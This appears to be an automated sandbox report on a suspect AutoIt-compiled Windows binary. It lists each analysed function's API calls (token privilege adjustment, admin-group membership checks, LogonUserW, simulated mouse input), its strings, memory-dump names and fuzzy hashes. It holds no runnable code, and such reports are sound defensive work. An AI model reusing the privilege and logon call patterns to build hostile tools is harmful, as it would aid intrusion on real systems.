GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00FFB465
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00FFB4B2

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 32379d9e542fdcce39772673ae4bdeb0ae2283d18933fcc316d69283254c24cb
Instruction ID: 5d602fa5ea7f1040739545889cb9ba32086a1374d47c280c33766f0313faf415
Opcode Fuzzy Hash: 32379d9e542fdcce39772673ae4bdeb0ae2283d18933fcc316d69283254c24cb
Instruction Fuzzy Hash: 99216D35A00108EFDB00EFA5DC80AEEBBB8FF49314F1480A9E945EB355DB359919DB50

Function 00FE87E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00FB0DB6: std::exception::exception.LIBCMT ref: 00FB0DEC
Part of subcall function 00FB0DB6: __CxxThrowException@8.LIBCMT ref: 00FB0E01

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FE882B
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FE8858
GetLastError.KERNEL32 ref: 00FE8865

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 522c9777ccfd3add0cc026a39d0dd7ada4c208077c8906b010f46a5f5858f7ce
Instruction ID: 926f61b4b6b541ee4231a49f9b2c56ec1a35d0a32a05d0eb7ed590a2bacf4a14
Opcode Fuzzy Hash: 522c9777ccfd3add0cc026a39d0dd7ada4c208077c8906b010f46a5f5858f7ce
Instruction Fuzzy Hash: C411B2B2804205AFD728EF55DC85D6BB7F8FB04350B10852EF49983241DF34BC018B60

Function 00FE874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00FE8774
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00FE878B
FreeSid.ADVAPI32(?), ref: 00FE879B

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 8365464a8d7a7fd15046fc547af38ff733adb4d19bb012596f78d40a73cc6997
Instruction ID: 70d1929a04987c32fd916d39e51135b4e7111df8e38fc4940f6c7475f0af4a3c
Opcode Fuzzy Hash: 8365464a8d7a7fd15046fc547af38ff733adb4d19bb012596f78d40a73cc6997
Instruction Fuzzy Hash: D1F04975A1130DBFDF00DFF4DD89AAEBBBCEF08211F1044A9A901E2180E6796A488B50

Function 00FF4C7F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00FF4CB3

Strings

DOWN, xrefs: 00FF4C98

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: mouse_event
String ID: DOWN
API String ID: 2434400541-711622031
Opcode ID: 4e22d78ad886f5eb69ebefbbdfdc17390226b2ff17a72037bc713c0b66c49489
Instruction ID: 8ed5365b76f0acdd556de5723766a5b9396c07d9a2e33f1c7bf0b43de7157730
Opcode Fuzzy Hash: 4e22d78ad886f5eb69ebefbbdfdc17390226b2ff17a72037bc713c0b66c49489
Instruction Fuzzy Hash: FEE08C7219D7223DB948291ABC03FF7278C8F12735B10125AFA50E94D1ED896C8239B8

Function 00FFC6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00FFC6FB
FindClose.KERNEL32(00000000), ref: 00FFC72B

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 7c72034f8b32127f9936e56b4053ec585b7f615c198392af52a5d67178c46124
Instruction ID: 47323432674954ff2392a27b6678b803331b813befc46e8af93220f42da1b675
Opcode Fuzzy Hash: 7c72034f8b32127f9936e56b4053ec585b7f615c198392af52a5d67178c46124
Instruction Fuzzy Hash: 1A118E726046049FDB10EF29C845A6AF7E8EF85324F05851DF9A9C7291DB74A805DF81

Function 00FFA06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,01009468,?,0101FB84,?), ref: 00FFA097
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,01009468,?,0101FB84,?), ref: 00FFA0A9

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: e208835b697b1c6bfe2f4cc074dc52e46516fc09f7b9d0b37a68e579f4ee9bc0
Instruction ID: d8c7a82c780d56292506e801a1276d9a9c26d2ab4f229d8921c3bc3a4714bc2e
Opcode Fuzzy Hash: e208835b697b1c6bfe2f4cc074dc52e46516fc09f7b9d0b37a68e579f4ee9bc0
Instruction Fuzzy Hash: 7FF0E23610422EABDB21AFA4DC48FEA736CBF08361F008156F908D3181DA349904DBA1

Function 00FE81CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00FE8309), ref: 00FE81E0
CloseHandle.KERNEL32(?,?,00FE8309), ref: 00FE81F2

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 7551864630eb986a0f52261f0a8d77d87f521c02d804b40382c43e9fed402cc5
Instruction ID: 4e5fa0cc37fc6cdf383c9ba0ffd05343a5797b5b0697a06f6447d82c74641269
Opcode Fuzzy Hash: 7551864630eb986a0f52261f0a8d77d87f521c02d804b40382c43e9fed402cc5
Instruction Fuzzy Hash: 17E0E671010511AFE7253B61EC05D7777E9EF04350714891DF49584474DB6A9C91EB10

Function 00FBA155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00FB8D57,?,?,?,00000001), ref: 00FBA15A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00FBA163

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: cdacae2c5618557d1393d2f88768d501b482cd304f78aa070c0cc4cfa65fee63
Instruction ID: e0f05faf073ad3a3923c5e5fa775d51f840c21a8a3cee4904f5e6a61fdcae2c1
Opcode Fuzzy Hash: cdacae2c5618557d1393d2f88768d501b482cd304f78aa070c0cc4cfa65fee63
Instruction Fuzzy Hash: 71B0923105420AEBCA102B91E809B883F68FB44BAAF408010F64D84054CBEB54548B91

Function 00FBF1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b0babee5e4072b4fd2a1c4b026fe22e7e3e261562fc52b9663738700668724c
Instruction ID: 53bd9592f7ff4432dca94b3937199ae9bbe8d4e7fb57e07b62787f8ba2465e7e
Opcode Fuzzy Hash: 1b0babee5e4072b4fd2a1c4b026fe22e7e3e261562fc52b9663738700668724c
Instruction Fuzzy Hash: AA32F032D29F014DD7339939CC32325A248AFB73D4F25D737E85AB59AAEB29C4875600

Function 00FC242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63d1a90634b24f20aa23999167c806d474d8e57c4cfc750f350ffe12c6186785
Instruction ID: e3d5df0a2bd2faccc562e70228cdb5381b483cb34452ddef89f061f040c74ed7
Opcode Fuzzy Hash: 63d1a90634b24f20aa23999167c806d474d8e57c4cfc750f350ffe12c6186785
Instruction Fuzzy Hash: 41B1FF30E2AF418DD2339A398931336B65CAFBB2D5F61D71BFC6671D16EB2685834240

Function 00FF8889 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 00FF889B

Part of subcall function 00FB520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00FF8F6E,00000000,?,?,?,?,00FF911F,00000000,?), ref: 00FB5213
Part of subcall function 00FB520A: __aulldiv.LIBCMT ref: 00FB5233

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: 8e37dc06dd7939942c8f4ac0e9e1c9254aab2c6b0e82706b151e3ec0be17a233
Instruction ID: 8b39a9c94abf9e99442442b493ccf9c80505edb02ecf91d1297c98654fb42a2e
Opcode Fuzzy Hash: 8e37dc06dd7939942c8f4ac0e9e1c9254aab2c6b0e82706b151e3ec0be17a233
Instruction Fuzzy Hash: ED21A232A256108BC729CF25D441A62B3E1EFA5361F688E6CD1F5CB2D0CA39A905DB54

Function 00FE87B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00FE8389), ref: 00FE87D1

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 84ebcd8fb24b9595508431e855afdfcd50c115fcc2541c820480c2dcfbb79701
Instruction ID: 122744b433ebcb08f95c47114d23e6face2e78a2f6a847968da9b02631f7128f
Opcode Fuzzy Hash: 84ebcd8fb24b9595508431e855afdfcd50c115fcc2541c820480c2dcfbb79701
Instruction Fuzzy Hash: F6D05E3226050EABEF018EA4DC01EAE3B69EB04B01F408111FE15C50A0C77AD835AF60

Function 00FBA124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 00FBA12A

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: a4a9e3b56d92bbaa17f589da26803c894000140f5d4cb01504f2205dbd686e55
Instruction ID: 6f706cf793e105f839add71619735bbf3e003852f542974d1f45facf7aef3522
Opcode Fuzzy Hash: a4a9e3b56d92bbaa17f589da26803c894000140f5d4cb01504f2205dbd686e55
Instruction Fuzzy Hash: F4A0113000020EAB8A002A82E808888BFACEA002A8B008020F80C80022CBBBA8208A80

Function 00FA8808 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee8d2c6dc37aa8e3c0db2c9c531f9d887630c404937dd660a04a37d1fbbcadb8
Instruction ID: 0ed82a3c1e8e352958e499665093274829ec5ef4f72635814a05378c4615452a
Opcode Fuzzy Hash: ee8d2c6dc37aa8e3c0db2c9c531f9d887630c404937dd660a04a37d1fbbcadb8
Instruction Fuzzy Hash: 862255B5D041869BDF388A15C49437D77A1FF067A8F28802BD982CB592DBB89C93F741

Function 00FB21C5 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 2f5ed822d17f0e103269afd1918115b1a49a90c134168297aec8e531699cf1d7
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: D8C1A7326050930ADF6D463BC4741BEFBA16EA27B135E075DD4B3CB1D5EE10C925EA20

Function 00FB25FA Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 0e77ea0d153a3893ba1cdcb30323aef248dbf4242fbc6a409bdde64ef8a06f4a
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: AEC1973361519309DF6D463BC4341BEBBA16EA27B136A076DD4B3DB1D4EE20C925FA20

Function 00FB1978 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: ba2fc4192f818ec6f2168880ad6d3f8d6be27ce53320feb63413de33eb0f2f8a
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 8EC1823271519309DF2D463BC4741BEBBA17EA27B139A076DD4B3CB1D4EE20D925EA20

Function 01007806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 0100785B
DeleteObject.GDI32(00000000), ref: 0100786D
DestroyWindow.USER32 ref: 0100787B
GetDesktopWindow.USER32 ref: 01007895
GetWindowRect.USER32(00000000), ref: 0100789C
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 010079DD
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 010079ED
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01007A35
GetClientRect.USER32(00000000,?), ref: 01007A41
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 01007A7B
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01007A9D
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01007AB0
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01007ABB
GlobalLock.KERNEL32(00000000), ref: 01007AC4
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01007AD3
GlobalUnlock.KERNEL32(00000000), ref: 01007ADC
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01007AE3
GlobalFree.KERNEL32(00000000), ref: 01007AEE
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01007B00
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,01022CAC,00000000), ref: 01007B16
GlobalFree.KERNEL32(00000000), ref: 01007B26
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 01007B4C
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 01007B6B
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01007B8D
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01007D7A

Strings

DISPLAY, xrefs: 01007BDD
static, xrefs: 01007A75, 01007BCC
, xrefs: 01007D00
AutoIt v3, xrefs: 01007A2D

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 0e82ec6037f0b9fb39d0134fd8485d3df47cced9ed7f8669c3aa0d0e027480c0
Instruction ID: 8ecc286d2b67f97b35c98d0b466042bc91571d0550ccc7a4b819b3a8e0a46fc6
Opcode Fuzzy Hash: 0e82ec6037f0b9fb39d0134fd8485d3df47cced9ed7f8669c3aa0d0e027480c0
Instruction Fuzzy Hash: 2F028171900105EFEB15DFA8DC89EAE7BB9FF49310F048158F985AB291CB79AD01CB60

Function 0101356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,0101F910), ref: 01013627
IsWindowVisible.USER32(?), ref: 0101364B

Strings

GETLINE, xrefs: 0101399B
GETCURRENTLINE, xrefs: 010138ED
ISCHECKED, xrefs: 01013839
UNCHECK, xrefs: 01013883
CURRENTTAB, xrefs: 010136BD
CHECK, xrefs: 0101386D
SETCURRENTSELECTION, xrefs: 010137B6
GETCURRENTSELECTION, xrefs: 010137E3
TABRIGHT, xrefs: 0101369D
SENDCOMMANDID, xrefs: 010139DA
DELSTRING, xrefs: 01013749
